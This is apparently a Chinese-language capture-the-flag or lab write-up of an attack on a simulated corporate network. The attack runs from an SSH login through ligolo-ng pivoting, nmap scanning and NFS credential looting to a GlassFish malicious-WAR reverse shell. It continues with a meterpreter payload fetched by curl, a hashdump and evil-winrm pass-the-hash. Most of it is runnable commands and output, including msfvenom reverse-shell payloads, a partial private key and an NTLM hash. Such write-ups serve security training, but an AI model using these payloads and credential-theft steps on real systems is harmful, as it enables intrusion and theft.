xJIG+SMIbmgWqX8nwjuojoI6bFXqtYYWu8/wu/EAsJTzHCeJ3yPXPPg2ozCZGBOoxc/LQn 3tk1a4Xc+eZBX9RD4GtmG7RDOxm3l4+J7h9j1ky8KcFIuCm38SSHtkrpPO7q/K02tKsTiP t6gEJTF8xOr+XjAAAADnJvb3RAV0VCLU5JWDAxAQIDBA== -----END OPENSSH PRIVATE KEY-----
1 2 3 4 5 6 $ chmod 600 id_rsa $ ssh -i id_rsa root@10.129.194.34 <SNIP> root@WEB-NIX01:~#
Piovt 将 ligolo-ng agent 工具上传到 WEB-NIX01 机器
1 scp -i id_rsa ~/Cybersecurity/transfer/agent root@10.129.194.34:~/
在启动 ligolo-ng proxy 工具之后执行下方命令
1 root@WEB-NIX01:~# ./agent -connect 10.10.16.2:11601 -ignore-cert
启动 ligolo-ng proxy 工具并设置好 interface
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 $ sudo ./proxy -selfcert [sudo] password for kali: WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! WARN[0000] Using self-signed certificates WARN[0000] TLS Certificate fingerprint for ligolo is: E5D693014A596F64F94182EE781819FBF8CAD4A21C6C2259041083B5F912459F INFO[0000] Listening on 0.0.0.0:11601 __ _ __ / / (_)___ _____ / /___ ____ ____ _ / / / / __ `/ __ \/ / __ \______/ __ \/ __ `/ / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / /_____/_/\__, /\____/_/\____/ /_/ /_/\__, / /____/ /____/ Made in France ♥ by @Nicocha30! Version: 0.6.2 ligolo-ng » ifcreate --name ligolo INFO[0014] Creating a new "ligolo" interface... INFO[0014] Interface created! ligolo-ng » route_add --name ligolo --route 172.16.139.0/24 INFO[0044] Route created. ligolo-ng » INFO[4160] Agent joined. name=root@WEB-NIX01 remote="10.129.194.34:40736" ligolo-ng » session ? Specify a session : 1 - #1 - root@WEB-NIX01 - 10.129.194.34:40736 [Agent : root@WEB-NIX01] » start --tun ligolo INFO[4216] Starting tunnel to root@WEB-NIX01
fping 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ fping -asqg 172.16.139.0/24 172.16.139.3 172.16.139.10 172.16.139.35 254 targets 3 alive 250 unreachable 0 unknown addresses 1003 timeouts (waiting for response) 1007 ICMP Echos sent 7 ICMP Echo Replies received 0 other ICMP received 383 ms (min round trip time) 432 ms (avg round trip time) 567 ms (max round trip time) 9.875 sec (elapsed real time)
nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 $ nmap --open -PE -oA nmap_1k -iL host.list Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-19 02:17 EST Nmap scan report for 172.16.139.3 Host is up (0.65s latency). Not shown: 989 closed tcp ports (reset) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl Nmap scan report for 172.16.139.35 Host is up (0.71s latency). Not shown: 989 closed tcp ports (reset) PORT STATE SERVICE 111/tcp open rpcbind 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2049/tcp open nfs 3389/tcp open ms-wbt-server 4848/tcp open appserv-http 7676/tcp open imqbrokerd 8080/tcp open http-proxy 8181/tcp open intermapper 10000/tcp open snet-sensor-mgmt Nmap done: 2 IP addresses (2 hosts up) scanned in 33.89 seconds
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 $ nmap --open -p- -A -PE -oA nmap_all -iL host.list Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-19 03:04 EST Nmap scan report for 172.16.139.3 Host is up (0.33s latency). Not shown: 65510 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-19 08:35:27Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trilocor.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trilocor.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc Microsoft Windows RPC 49680/tcp open msrpc Microsoft Windows RPC 49684/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 49704/tcp open msrpc Microsoft Windows RPC Aggressive OS guesses: 3Com Baseline Switch 2924-SFP or Cisco ESW-520 switch or Allied Telesis AT-8000 series switch (86%), Allied Telesis AT-8000S; Dell PowerConnect 2824, 3448, 5316M, or 5324; Linksys SFE2000P, SRW2024, SRW2048, or SRW224G4; or TP-LINK TL-SL3428 switch (86%), Linksys SRW2008MP switch (86%), Cisco SG 300-10, Dell PowerConnect 2748, Linksys SLM2024, SLM2048, or SLM224P, or Netgear FS728TP or GS724TP switch (86%), Linksys SRW2000-series or Allied Telesyn AT-8000S switch (86%), DragonFly BSD 2.9.1 - 3.1 (85%), Cisco SG 200 or SG 300 switch (85%), Cisco SRW2008-K9 switch (85%), OpenBSD 5.5 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:c6:4b (VMware) | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-01-19T08:39:44 |_ start_date: N/A TRACEROUTE HOP RTT ADDRESS 1 330.73 ms 172.16.139.3 Nmap scan report for 172.16.139.35 Host is up (0.34s latency). Not shown: 65505 closed tcp ports (reset) PORT STATE SERVICE VERSION 111/tcp open rpcbind? |_rpcinfo: ERROR: Script execution failed (use -d to debug) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 2049/tcp open mountd 1-3 (RPC #100005) 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: trilocor | NetBIOS_Domain_Name: trilocor | NetBIOS_Computer_Name: MS01 | DNS_Domain_Name: trilocor.local | DNS_Computer_Name: MS01.trilocor.local | DNS_Tree_Name: trilocor.local | Product_Version: 10.0.17763 |_ System_Time: 2025-01-19T08:39:39+00:00 | ssl-cert: Subject: commonName=MS01.trilocor.local | Not valid before: 2025-01-17T14:48:50 |_Not valid after: 2025-07-19T14:48:50 |_ssl-date: 2025-01-19T08:39:59+00:00; 0s from scanner time. 3700/tcp open giop CORBA naming service |_giop-info: ERROR: Script execution failed (use -d to debug) 3820/tcp open ssl/scp? |_ssl-date: 2025-01-19T08:40:00+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=MS01.trilocor.local/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US | Not valid before: 2022-07-26T13:21:24 |_Not valid after: 2032-07-23T13:21:24 3920/tcp open ssl/exasoftport1? |_ssl-date: 2025-01-19T08:40:01+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=MS01.trilocor.local/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US | Not valid before: 2022-07-26T13:21:24 |_Not valid after: 2032-07-23T13:21:24 4848/tcp open http Oracle GlassFish 3.1.2.2 (Servlet 3.0; JSP 2.2; Java 1.7) |_http-title: Login |_http-server-header: Oracle GlassFish Server 3.1.2.2 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 7676/tcp open java-message-service Java Message Service 4.5.2 Patch 1 8080/tcp open http Oracle GlassFish 3.1.2.2 (Servlet 3.0; JSP 2.2; Java 1.7) | http-methods: |_ Potentially risky methods: PUT DELETE TRACE |_http-title: GlassFish Server 3.1.2 - Server Running |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Oracle GlassFish Server 3.1.2.2 8181/tcp open ssl/intermapper? |_ssl-date: 2025-01-19T08:40:00+00:00; +1s from scanner time. | ssl-cert: Subject: commonName=MS01.trilocor.local/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US | Not valid before: 2022-07-26T13:21:24 |_Not valid after: 2032-07-23T13:21:24 8686/tcp open java-rmi Java RMI | rmi-dumpregistry: | MS01.trilocor.local/7676/jmxrmi | javax.management.remote.rmi.RMIServerImpl_Stub | @172.16.139.35:51544 | extends | java.rmi.server.RemoteStub | extends | java.rmi.server.RemoteObject | jmxrmi | javax.management.remote.rmi.RMIServerImpl_Stub | @172.16.139.35:8686 | extends | java.rmi.server.RemoteStub | extends |_ java.rmi.server.RemoteObject 10000/tcp open http Jetty 9.4.46.v20220331 |_http-server-header: Jetty(9.4.46.v20220331) |_http-title: Site doesn't have a title (text/html;charset=utf-8). | http-robots.txt: 1 disallowed entry |_/ 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49680/tcp open msrpc Microsoft Windows RPC 49681/tcp open msrpc Microsoft Windows RPC 49682/tcp open msrpc Microsoft Windows RPC 51544/tcp open java-rmi Java RMI 51547/tcp open unknown 51548/tcp open unknown 51549/tcp open unknown Device type: broadband router|phone|general purpose Running (JUST GUESSING): Scientific Atlanta embedded (86%), Sony Ericsson embedded (85%), IBM z/OS 1.12.X (85%), IBM OS/390 V2 (85%), HP OpenVMS 7.X|8.X (85%) OS CPE: cpe:/h:scientificatlanta:webstar_epc2203 cpe:/h:sonyericsson:j20 cpe:/h:sonyericsson:j20i cpe:/o:ibm:zos:1.12 cpe:/o:ibm:os_390:v2 cpe:/o:hp:openvms:7 cpe:/o:hp:openvms:8 Aggressive OS guesses: Scientific Atlanta WebSTAR EPC2203 cable modem (86%), Sony Ericsson Hazel (J10, J20) or Elm mobile phone (85%), Sony Ericsson W705 or W995 Walkman mobile phone (85%), IBM z/OS 1.12 (85%), IBM OS/390 V2 (85%), HP OpenVMS 7.3 - 8.3 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: MS01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:38:4e (VMware) | smb2-time: | date: 2025-01-19T08:39:35 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required TRACEROUTE HOP RTT ADDRESS 1 340.51 ms 172.16.139.35 Post-scan script results: | clock-skew: | 0s: | 172.16.139.3 |_ 172.16.139.35 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 2 IP addresses (2 hosts up) scanned in 2543.51 seconds
Service Enumeration SMB (All Failed) NFS (MS01) 挂载 MS01 机器 NFS
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 $ showmount -e 172.16.139.35 Export list for 172.16.139.35: /MS01 (everyone) $ sudo mkdir /mnt/MS01 $ sudo mount -t nfs 172.16.139.35:/MS01 /mnt/MS01 $ cd /mnt/MS01 $ tree . ├── apps │ ├── glassfish │ │ ├── bin │ │ │ ├── appclient │ │ │ ├── appclient.bat │ │ │ ├── appclient.js │ │ │ ├── asadmin │ │ │ ├── asadmin.bat │ │ │ ├── asupgrade │ │ │ ├── asupgrade.bat │ │ │ ├── capture-schema │ │ │ ├── capture-schema.bat │ │ │ ├── jspc │ │ │ ├── jspc.bat │ │ │ ├── package-appclient │ │ │ ├── package-appclient.bat │ │ │ ├── schemagen │ │ │ ├── schemagen.bat │ │ │ ├── startserv │ │ │ ├── startserv.bat │ │ │ ├── stopserv │ │ │ ├── stopserv.bat │ │ │ ├── wscompile │ │ │ ├── wscompile.bat │ │ │ ├── wsdeploy │ │ │ ├── wsdeploy.bat │ │ │ ├── wsgen │ │ │ ├── wsgen.bat │ │ │ ├── wsimport │ │ │ ├── wsimport.bat │ │ │ ├── xjc │ │ │ └── xjc.bat │ │ ├── config │ │ │ ├── asenv.bat │ │ │ ├── asenv.conf │ │ │ ├── client-jnlp-config.properties │ │ │ ├── glassfish.container │ │ │ └── osgi.properties │ │ ├── docs │ │ │ ├── about.html │ │ │ ├── copyright.html │ │ │ ├── css │ │ │ │ └── default.css │ │ │ ├── features.html │ │ │ ├── graphics │ │ │ │ └── logo_sun.gif │ │ │ └── quickstart.html │ │ ├── domains │ │ │ └── domain1 │ │ │ ├── applications │ │ │ ├── autodeploy │ │ │ │ └── bundles │ │ │ ├── bin │ │ │ │ ├── domain1Service.err.log │ │ │ │ ├── domain1Service.exe │ │ │ │ ├── domain1Service.out.log │ │ │ │ ├── domain1Service.wrapper.log │ │ │ │ └── domain1Service.xml │ │ │ ├── config │ │ │ │ ├── admin-keyfile │ │ │ │ ├── cacerts.jks │ │ │ │ ├── default-web.xml │ │ │ │ ├── domain-passwords │ │ │ │ ├── domain.xml │ │ │ │ ├── domain.xml.bak │ │ │ │ ├── keyfile │ │ │ │ ├── keystore.jks │ │ │ │ ├── local-password │ │ │ │ ├── lockfile │ │ │ │ ├── logging.properties │ │ │ │ ├── login.conf │ │ │ │ ├── pid │ │ │ │ ├── pid.prev │ │ │ │ ├── server.policy │ │ │ │ ├── sun-acc.xml │ │ │ │ ├── wss-server-config-1.0.xml │ │ │ │ └── wss-server-config-2.0.xml │ │ │ ├── docroot │ │ │ │ └── index.html │ │ │ ├── generated │ │ │ │ ├── ejb │ │ │ │ │ └── __admingui │ │ │ │ ├── jsp │ │ │ │ │ ├── __admingui │ │ │ │ │ │ └── loader_529795024 │ │ │ │ │ │ ├── css │ │ │ │ │ │ │ ├── css_ie5win.css │ │ │ │ │ │ │ ├── css_ie6up.css │ │ │ │ │ │ │ ├── css_ns4sol.css │ │ │ │ │ │ │ ├── css_ns4win.css │ │ │ │ │ │ │ ├── css_ns6up.css │ │ │ │ │ │ │ └── sysnet.css │ │ │ │ │ │ ├── images │ │ │ │ │ │ │ ├── ar_dbl_blue.png │ │ │ │ │ │ │ ├── backimage.jpg │ │ │ │ │ │ │ ├── common_tasks.gif │ │ │ │ │ │ │ ├── configurations.gif │ │ │ │ │ │ │ ├── container.gif │ │ │ │ │ │ │ ├── disabled.png │ │ │ │ │ │ │ ├── domain.gif │ │ │ │ │ │ │ ├── dot.gif │ │ │ │ │ │ │ ├── enabled.png │ │ │ │ │ │ │ ├── gradlogbot.jpg │ │ │ │ │ │ │ ├── gradlogsides.jpg │ │ │ │ │ │ │ ├── gradlogtop.jpg │ │ │ │ │ │ │ ├── http.gif │ │ │ │ │ │ │ ├── instance.gif │ │ │ │ │ │ │ ├── jvm.gif │ │ │ │ │ │ │ ├── logger_1.gif │ │ │ │ │ │ │ ├── logger.gif │ │ │ │ │ │ │ ├── primary-enabled.gif │ │ │ │ │ │ │ ├── PrimaryProductName.png │ │ │ │ │ │ │ ├── primary-roll.gif │ │ │ │ │ │ │ ├── regbkgrnd.png │ │ │ │ │ │ │ ├── registration.gif │ │ │ │ │ │ │ ├── registration.png │ │ │ │ │ │ │ ├── regReminderBackground.png │ │ │ │ │ │ │ ├── regReminderBullets.png │ │ │ │ │ │ │ ├── resources.gif │ │ │ │ │ │ │ ├── support.gif │ │ │ │ │ │ │ ├── support.png │ │ │ │ │ │ │ ├── system_properties.png │ │ │ │ │ │ │ └── webModule.gif │ │ │ │ │ │ ├── index.jsf │ │ │ │ │ │ ├── js │ │ │ │ │ │ │ └── cj.js │ │ │ │ │ │ ├── loginError.jsf │ │ │ │ │ │ ├── login.jsf │ │ │ │ │ │ ├── META-INF │ │ │ │ │ │ │ ├── jsftemplating │ │ │ │ │ │ │ │ └── Handler.map │ │ │ │ │ │ │ ├── MANIFEST.MF │ │ │ │ │ │ │ └── maven │ │ │ │ │ │ │ └── org.glassfish.main.admingui │ │ │ │ │ │ │ └── console-core │ │ │ │ │ │ │ ├── pom.properties │ │ │ │ │ │ │ └── pom.xml │ │ │ │ │ │ ├── org │ │ │ │ │ │ │ └── glassfish │ │ │ │ │ │ │ └── admingui │ │ │ │ │ │ │ └── core │ │ │ │ │ │ │ └── Strings.properties │ │ │ │ │ │ └── templates │ │ │ │ │ │ ├── bareLayout.xhtml │ │ │ │ │ │ ├── baseLayout.xhtml │ │ │ │ │ │ ├── default.layout │ │ │ │ │ │ ├── iframe.layout │ │ │ │ │ │ ├── menu.inc │ │ │ │ │ │ ├── menuLayout.xhtml │ │ │ │ │ │ ├── tagsPanel.jsf │ │ │ │ │ │ └── treeLayout.xhtml │ │ │ │ │ └── __default-web-module-server │ │ │ │ ├── policy │ │ │ │ │ ├── __admingui │ │ │ │ │ │ └── __admingui │ │ │ │ │ │ └── granted.policy │ │ │ │ │ └── __default-web-module │ │ │ │ │ └── __default-web-module │ │ │ │ │ └── granted.policy │ │ │ │ └── xml │ │ │ │ └── __admingui │ │ │ ├── lib │ │ │ │ ├── applibs │ │ │ │ ├── classes │ │ │ │ ├── databases │ │ │ │ └── ext │ │ │ ├── logs │ │ │ │ ├── server.log │ │ │ │ └── server.log.lck │ │ │ ├── osgi-cache │ │ │ │ └── felix │ │ │ │ ├── bundle0 │ │ │ │ │ ├── bundle.id │ │ │ │ │ ├── glassfish.bundleids │ │ │ │ │ └── provisioning.properties │ │ │ │ ├── bundle1 │ │ │ │ │ ├── bundle.info │ │ │ │ │ └── version0.0 │ │ │ │ │ ├── bundle.jar │ │ │ │ │ └── revision.location <SNIP> │ ├── jboss │ │ ├── ApplicationClientComponentDescription.java │ │ ├── build.bat │ │ ├── build.sh │ │ ├── mvnw.cmd │ │ └── pom.xml │ └── tomcat │ ├── context.xml │ └── tomcat-users.xml ├── dev │ ├── Browser.cs │ ├── BuildPackages.bat │ ├── CKEditorDefaultSettings.xml │ ├── CKToolbarButtons.xml │ ├── CKToolbarSets.xml │ ├── EnterModus.cs │ ├── FileListView.cs │ ├── LanguageDirection.cs │ ├── LinkMode.cs │ ├── LinkType.cs │ ├── SettingConstants.cs │ ├── SettingsMode.cs │ └── ToolBarLocation.cs ├── docs │ ├── AppSvcsDeclare.docx │ ├── as3Parser.docx │ ├── Important Document.docx │ └── tasks.build.docx ├── prod │ ├── Browser.aspx │ ├── Browser.aspx.designer.cs │ ├── Browser.aspx.resx │ ├── Browser.comb.css │ ├── Browser.comb.min.css │ ├── Browser.css │ ├── FileUploader.ashx │ ├── FileUploader.ashx.cs │ ├── jquery.fileupload.css │ ├── jquery.fileupload-ui.css │ ├── ProcessImage.ashx │ └── ProcessImage.ashx.cs ├── public │ ├── bundleconfig.json │ ├── CKEditorOptions.ascx │ ├── CKEditorOptions.ascx.cs │ ├── CKEditorOptions.ascx.designer.cs │ ├── CKEditorOptions.ascx.resx │ ├── CKHtmlEditorProvider.cs │ ├── Options.aspx │ ├── Options.aspx.cs │ ├── Options.aspx.designer.cs │ ├── packages.config │ ├── UrlControl.ascx │ └── WatchersNET.CKEditor.csproj ├── temp │ ├── 6342234238_2022-12-04-trilocorweb01.log │ ├── 9447886652_2022-06-15-trilocorweb02.log │ ├── 9987886652_2022-11-09-trilocorweb03 .log │ └── 9995464534_2022-11-09-trilocorweb04.log └── websites ├── HR │ ├── index.php │ ├── script.js │ └── style.css ├── Jobs │ ├── includes │ │ ├── index.php │ │ └── theme │ │ ├── carousel.php │ │ ├── common.php │ │ ├── config.php │ │ ├── footer.php │ │ ├── header.php │ │ ├── head.php │ │ ├── index.php │ │ └── nav.php │ └── index.php ├── Main │ ├── config │ │ └── apache.conf │ ├── index.php │ └── wp-includes │ ├── css │ │ └── dist │ │ └── block-library │ │ └── style.min.css │ ├── js │ │ ├── jquery │ │ │ ├── jquery-migrate.min.js │ │ │ ├── jquery.min.js │ │ │ └── ui │ │ │ └── core.min.js │ │ └── wp-embed.min.js │ └── wlwmanifest.xml ├── PR │ ├── index.php │ └── static │ ├── css │ │ └── main.css │ ├── fonts │ │ └── Assistant │ │ ├── Assistant-Bold.woff │ │ └── Assistant-Bold.woff2 │ ├── images │ │ ├── about-history.jpg │ │ ├── about-philosophy.jpg │ │ ├── about-winners.jpg │ │ ├── favicon.png │ │ ├── introduction-visual.png │ │ ├── logo-mini.svg │ │ ├── logo.svg │ │ ├── team-1.png │ │ ├── team-2.png │ │ └── team-3.png │ └── js │ ├── ace.js │ ├── alerts.js │ ├── avgrund.js │ ├── bootstrap-table.js │ ├── bt-maxLength.js │ ├── c3.js │ ├── calendar.js │ ├── chartist.js │ ├── circle-progress.js │ ├── clipboard.js │ ├── codeEditor.js │ ├── codemirror.js │ ├── context-menu.js │ ├── cropper.js │ ├── dashboard.js │ ├── data-table.js │ ├── db.js │ ├── desktop-notification.js │ ├── dragula.js │ ├── dropify.js │ ├── dropzone.js │ ├── editorDemo.js │ ├── file-upload.js │ ├── flot-chart.js │ ├── form-addons.js │ ├── formpickers.js │ ├── form-repeater.js │ ├── form-validation.js │ ├── functions.js │ ├── functions-min.js │ ├── google-charts.js │ ├── google-maps.js │ ├── hoverable-collapse.js │ ├── iCheck.js │ ├── inputmask.js │ ├── ion-range-slider.js │ ├── jq.tablesort.js │ ├── jquery-file-upload.js │ ├── js-grid.js │ ├── just-gage.js │ ├── light-gallery.js │ ├── listify.js │ ├── mapael_example_2.js │ ├── mapael.js │ ├── maps.js │ ├── misc.js │ ├── modal-demo.js │ ├── morris.js │ ├── no-ui-slider.js │ ├── off-canvas.js │ ├── owl-carousel.js │ ├── paginate.js │ ├── popover.js │ ├── profile-demo.js │ ├── rickshaw.js │ ├── select2.js │ ├── settings.js │ ├── sparkline.js │ ├── tablesorter.js │ ├── tabs.js │ ├── tight-grid.js │ ├── toastDemo.js │ ├── todolist.js │ ├── tooltips.js │ ├── typeahead.js │ ├── widgets.js │ ├── wizard.js │ └── x-editable.js ├── Shop │ ├── config │ │ └── apache.conf │ ├── controllers │ │ └── HomeController.php │ ├── index.php │ ├── Router.php │ └── views │ ├── about.php │ ├── contact.php │ ├── faq.php │ ├── includes │ │ ├── footer.php │ │ └── header.php │ └── index.php └── Vpn ├── css │ └── ssl_style.css ├── fonts │ ├── ftnt-icons.woff │ └── lato-regular.woff2 ├── ico │ └── favicon.ico ├── index.php └── verify.php 690 directories, 1626 files
获得一个密码凭证 /MS01/apps/glassfish/domains/domain1/config/local-password
1 2 $ cat /mnt/MS01/apps/glassfish/domains/domain1/config/local-password 4DE1087766BC3CCF2EF3FCDE6B95B6686650FC23
尝试破解 (Failed) /MS01/apps/glassfish/domains/domain1/config/admin-keyfile
1 2 3 4 5 6 7 $ cat /mnt/MS01/apps/glassfish/domains/domain1/config/admin-keyfile admin;{SSHA256}vLs7Hu2paGhV3cD32u+ZKjosTR9hiF0+eyA2WT8FtOkXa/8OUvs4Sw==;asadmin $ echo vLs7Hu2paGhV3cD32u+ZKjosTR9hiF0+eyA2WT8FtOkXa/8OUvs4Sw== |base64 -d | xxd -p -c 40 | sed 's/.\{64\}/&:/' bcbb3b1eeda9686855ddc0f7daef992a3a2c4d1f61885d3e7b2036593f05b4e9:176bff0e52fb384b $ hashcat -m 1410 -hexsalt hash rockyou.txt (fail)
Web Application 172.16.139.3:47001
172.16.139.35:5985
172.16.139.35:10000 (Jenkins)
172.16.139.35:8080 (GlassFish 3.1.2)
172.16.139.35:4848 (GlassFish Administration Console)
尝试使用 NFS 挂载中文件的密码登录 /mnt/MS01/apps/glassfish/domains/domain1/config/local-password
1 admin:4DE1087766BC3CCF2EF3FCDE6B95B6686650FC23
漏洞利用链接 exploiting-glassfish , 先使用 msfvenom 工具生成恶意 war 包
1 msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.139.10 LPORT=4444 -f war > evil.war
在 Applications 界面 Deploy 恶意的 war 文件
访问 http://172.16.139.35:8080/evil/ 后,就会监听到此 ReversaShell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 root@WEB-NIX01:~# nc -lvnp 4444 Listening on 0.0.0.0 4444 Connection received on 172.16.139.35 49875 Microsoft Windows [Version 10.0.17763.3287] (c) 2018 Microsoft Corporation. All rights reserved. C:\glassfish3\glassfish\domains\domain1\config> whoami whoami ms01\svc_glassfish C:\glassfish3\glassfish\domains\domain1\config> cd c:\Users\svc_glassfish\Desktop cd c:\Users\svc_glassfish\Desktop C:\glassfish3\glassfish\domains\domain1\config> dir dir Volume in drive C has no label. Volume Serial Number is 49CC-05AB Directory of c:\Users\svc_glassfish\Desktop 08/18/2022 12:54 PM <DIR> . 08/18/2022 12:54 PM <DIR> .. 01/20/2025 06:56 AM 34 flag.txt 1 File(s) 34 bytes 2 Dir(s) 8,083,361,792 bytes free c:\Users\svc_glassfish\Desktop>type flag.txt type flag.txt 9f82497709b3456c0004a82227a5f9a6
Lateral movement MS01 Privilege Escalation 再次使用 MSF 拿到一个稳定的 Shell
1 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.139.10 LPORT=1234 -f exe -o win.exe
ligolo-ng 工具添加监听器 (2222 文件传输;1234 MSF监听)
1 2 3 4 [Agent : root@WEB-NIX01] » listener_add --addr 172.16.139.10:2222 --to 10.10.16.2:2222 --tcp INFO[3211] Listener 0 created on remote agent! [Agent : root@WEB-NIX01] » listener_add --addr 172.16.139.10:1234 --to 10.10.16.2:1234 --tcp INFO[3903] Listener 3 created on remote agent!
将恶意 exe 文件上传到 MS01 机器
1 2 3 4 5 c:\Users\svc_glassfish\Desktop> curl -O http://172.16.139.10:2222/win.exe or PS c:\Users\svc_glassfish\Desktop> iwr http://172.16.139.10:2222/win.exe -o win.exe 等 Metasploit 启动后再运行 .\win.exe
MSF
1 2 3 4 5 use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST 10.10.16.2 set LPORT 1234 run
查看进程
在 Shell 中查询 DcomLaunch 服务,DcomLaunch 服务负责管理 DCOM 和 RPC 机制,是远程执行代码的重要基础
1 tasklist /FI "SERVICES eq DcomLaunch" /FI "IMAGENAME eq svchost.exe" /V
迁移此进程,权限提升
hashdump
Credential Theft 1 evil-winrm -i 172.16.139.35 -u administrator -H b3a92efa782776e463a52131f7d7fd89
上传 winPEASx64.exe 工具
1 *Evil-WinRM* PS C:\Users\Administrator\Desktop> upload winPEASx64.exe
利用 evil-winrm 工具下载 MS01_administrator.peas 文件 (没有直接的敏感文件信息)
